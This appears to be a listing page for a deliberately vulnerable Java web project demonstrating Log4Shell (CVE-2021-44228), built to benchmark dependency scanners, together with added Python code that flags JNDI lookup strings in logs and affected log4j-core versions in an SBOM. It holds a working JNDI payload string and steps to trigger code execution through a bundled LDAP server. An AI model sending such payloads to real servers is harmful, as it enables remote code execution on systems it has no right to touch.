
CVE-2021-44228 PoC — Apache Log4j code issue vulnerability

Source
Associated Vulnerability
Title: Apache Log4j code issue vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Foundation (USA). Apache Log4j has a code issue vulnerability: an attacker can craft a data request and send it to a server that uses Apache Log4j, and remote code execution is triggered when that request is written to the log.
Description
Java EE web project with the log4shell (CVE-2021-44228) vulnerability
Readme
## log4shell true positive

This is a simple web project with a log4shell vulnerability.
The project defines a simple `scabench.HelloWorldService` GET service that returns the plain text string `hello world`.
The service does not expect parameters; if parameters are encountered, an error is logged
(and that log call is where the untrusted input reaches log4j).

The vulnerable dependency is [org.apache.logging.log4j:log4j-core:2.14.1](https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/2.14.1), the vulnerability is [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228). 


### Demonstrating the Vulnerability using a Test

This requires Unix or macOS; porting the project to Windows is easy.

A unit test is provided to demonstrate the vulnerability. The test requires an LDAP server that serves the code to be loaded; the respective executable (`dodgy-ldap-server.jar`) is provided by the project. It is defined in a separate project, [https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept](https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept), which is based on [https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept](https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept).
The test fixture handles startup and shutdown of the LDAP server.

The test creates a file `foo`: the command (`touch foo`) is embedded in the code served by the LDAP server that log4j connects to.
In a real attack, this server is under the attacker's control.

To run the test, build the project with `mvn test`.

### Demonstrating the Vulnerability running the Application

1. start the embedded web server: `mvn jetty:run`
2. start the included LDAP server: `java -jar dodgy-ldap-server.jar` (the vulnerable code will download Java code from this server)
3. point the browser to `http://localhost:8080/`; this page contains a pre-populated form with the malicious payload `${jndi:ldap://127.0.0.1/exe}`
4. submit this form
5. this will create a file `foo` on the server
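The steps above show the payload string travelling from a form field into a log call. From the defender's side, the same string is what an access-log or application-log review looks for. The following is an added example, not code from this project: it scans constructed access-log lines (the sample lines, the `find_jndi_lookups` helper and the regular expression are all assumptions made here) for a `${jndi:<scheme>://` lookup, undoing URL encoding first because the payload usually arrives in a query string or header. Detection of this kind is a stopgap; the fix remains upgrading `log4j-core` away from 2.14.1 to a release in which the JNDI lookup is removed or disabled.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the project). Lines 1-3 carry a
# JNDI lookup string in the query, in the User-Agent header and URL-encoded in
# the query respectively; lines 4 and 5 are benign (a plain `${10}` is not a lookup).
SAMPLE_LOG_LINES = [
    '127.0.0.1 - - [10/Dec/2021:12:00:01 +0000] "GET /?x=${jndi:ldap://127.0.0.1/exe} HTTP/1.1" 200 11 "-" "curl/7.79"',
    '127.0.0.1 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 11 "-" "${JNDI:rmi://127.0.0.1/exe}"',
    '127.0.0.1 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%2Fexe%7D HTTP/1.1" 200 11 "-" "curl/7.79"',
    '127.0.0.1 - - [10/Dec/2021:12:00:04 +0000] "GET /?x=${10} HTTP/1.1" 200 11 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 11 "-" "Mozilla/5.0"',
]

# Plain form of the lookup: `${jndi:` followed by a URI scheme. Log4j matches the
# prefix case-insensitively, so the detection must as well.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:([a-z]+)://", re.IGNORECASE)


def normalize(line):
    """Undo URL encoding repeatedly, since query strings are sometimes double-encoded."""
    prev = None
    while prev != line:
        prev, line = line, unquote(line)
    return line


def find_jndi_lookups(lines):
    """Return (line_number, scheme) for every line containing a JNDI lookup string."""
    findings = []
    for number, raw in enumerate(lines, 1):
        match = JNDI_LOOKUP.search(normalize(raw))
        if match:
            findings.append((number, match.group(1).lower()))
    return findings


if __name__ == "__main__":
    for number, scheme in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup via {scheme}")
```

This only catches the plain form of the lookup string; it is useful for confirming exposure in historical logs and for alerting, not as a substitute for removing the vulnerable dependency.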

### Running Software Composition Analyses

There are several shell scripts to run different analyses; the result reports can be found in `scan-results`.

### Generating the SBOM

The `pom.xml` has a plugin to generate an [SBOM](https://www.cisa.gov/sbom) in [CycloneDX](https://cyclonedx.org/) format.
To do this, run `mvn cyclonedx:makePackageBom`; the SBOM can be found in
`target/` in `json` and `xml` format.
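The SBOM is what makes the scans in `scan-results` (and any inventory check) mechanical: a consumer only needs to read the component list and compare versions. The following is an added example, not part of this project and not the output of the project's CycloneDX plugin: it parses a constructed CycloneDX 1.4 JSON fragment (assumed structure of `components` entries with `group`, `name`, `version` and `purl`, which is how the CycloneDX Maven plugin emits Maven coordinates) and flags every `log4j-core` component whose version falls in the ranges NVD lists for CVE-2021-44228. The `version_key`, `is_affected` and `find_vulnerable_log4j` names are assumptions made here.

```python
import json
import re

# Constructed CycloneDX 1.4 JSON fragment (not the project's actual target/ SBOM).
# log4j-core 2.14.1 is the dependency named in the README; the other two are filler.
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "components": [
        {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-api",
         "version": "2.14.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1?type=jar"},
        {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
         "version": "2.14.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1?type=jar"},
        {"type": "library", "group": "org.eclipse.jetty", "name": "jetty-server",
         "version": "9.4.44.v20210927", "purl": "pkg:maven/org.eclipse.jetty/jetty-server@9.4.44.v20210927?type=jar"},
    ],
})

# Version ranges NVD lists as affected by CVE-2021-44228 (log4j-core only):
# [lo, hi) pairs. 2.3.1, 2.12.2 and 2.15.0 are the fixed releases for each line.
# Follow-up CVEs (2021-45046, 2021-45105) have their own ranges and are not covered.
AFFECTED_RANGES = [("2.0-beta9", "2.3.1"), ("2.4", "2.12.2"), ("2.13.0", "2.15.0")]


def version_key(version):
    """Sortable key for Maven-style versions; a pre-release tag (beta, rc) sorts below its release."""
    match = re.match(r"(\d+(?:\.\d+)*)(?:-([a-zA-Z]+)(\d*))?", version)
    nums = [int(part) for part in match.group(1).split(".")]
    nums += [0] * (3 - len(nums))          # pad "2.4" to (2, 4, 0)
    if match.group(2):                     # e.g. "2.0-beta9" -> (2, 0, 0, 0, 9), below (2, 0, 0, 1, 0)
        return (*nums[:3], 0, int(match.group(3) or 0))
    return (*nums[:3], 1, 0)


def is_affected(version):
    """True if a log4j-core version lies in one of the affected [lo, hi) ranges."""
    key = version_key(version)
    return any(version_key(lo) <= key < version_key(hi) for lo, hi in AFFECTED_RANGES)


def find_vulnerable_log4j(sbom_json):
    """Return [(purl, version)] for every log4j-core component in an affected range."""
    hits = []
    for component in json.loads(sbom_json).get("components", []):
        if component.get("group") != "org.apache.logging.log4j" or component.get("name") != "log4j-core":
            continue
        if is_affected(component["version"]):
            purl = component.get("purl", f"{component['group']}:{component['name']}")
            hits.append((purl, component["version"]))
    return hits


if __name__ == "__main__":
    for purl, version in find_vulnerable_log4j(SAMPLE_SBOM):
        print(f"CVE-2021-44228: {purl} (version {version})")
```

The version comparison is the part worth getting right: a naive string comparison would rank `2.9.1` above `2.14.1`, and a check that ignores the pre-release tag would miss the `2.0-beta9` lower bound. To run it against the project's own SBOM, read `target/*.json` into `find_vulnerable_log4j` instead of `SAMPLE_SBOM`.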

File Snapshot

[4.0K] /data/pocs/a5969ee70e825ce1c86e9d312ec7040ba76313d5
├── [1.8M] dodgy-ldap-server.jar
├── [ 11K] LICENSE
├── [4.2K] pom.xml
├── [2.3K] README.md
├── [ 452] run-owasp.sh
├── [ 261] run-snyk.sh
├── [4.0K] scan-results
│   ├── [4.0K] dependency-check
│   │   └── [156K] dependency-check-report.json
│   └── [4.0K] snyk
│       └── [ 27K] snyk-report.json
└── [4.0K] src
    ├── [4.0K] main
    │   ├── [4.0K] java
    │   │   └── [4.0K] scabench
    │   │       └── [1.5K] HelloWorldService.java
    │   └── [4.0K] webapp
    │       └── [ 364] index.html
    └── [4.0K] test
        └── [4.0K] java
            └── [4.0K] scabench
                └── [1.9K] Log4ShellTest.java

11 directories, 11 files